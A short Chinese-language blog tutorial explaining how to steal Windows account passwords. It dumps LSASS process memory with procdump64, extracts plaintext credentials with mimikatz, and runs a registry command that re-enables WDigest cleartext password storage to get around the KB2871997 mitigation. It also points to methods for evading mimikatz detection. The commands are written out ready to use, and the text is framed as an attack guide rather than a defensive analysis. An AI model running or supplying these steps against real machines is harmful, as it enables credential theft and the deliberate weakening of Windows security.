两步完成利用procdump64+mimikatz获取win用户密码

Procudmp使用

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

两步完成利用procdump64+mimikatz获取win用户密码_第1张图片

 

 通过查看systeminfo

两步完成利用procdump64+mimikatz获取win用户密码_第2张图片

 

 

利用procdump64.exe导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

两步完成利用procdump64+mimikatz获取win用户密码_第3张图片

 

 利用mimikatz.exe从 lsass.exe 进程里获取windows处于active状态账号的明文密码

两步完成利用procdump64+mimikatz获取win用户密码_第4张图片

 

 两步完成利用procdump64+mimikatz获取win用户密码_第5张图片

 

 两步完成利用procdump64+mimikatz获取win用户密码_第6张图片

 

 

如果抓不到明文密码, 可能是因为win7之后就打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文口令,所以打了补丁的机器(版本较新的windows系统应该是自带的)都无法直接导出明文口令。

先放出结论,我们可以通过修改注册表来让Wdigest Auth保存明文口令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改了之后需要用户注销或者重启重新登陆之后才会生效

 

描述了mimikatz会被拦截,可以bypass的一些方法

https://www.freebuf.com/articles/web/176796.html

powershell确实是内网中的一个大杀器,有非常多的用处,msf也可以配合powershell。

  

你可能感兴趣的:(两步完成利用procdump64+mimikatz获取win用户密码)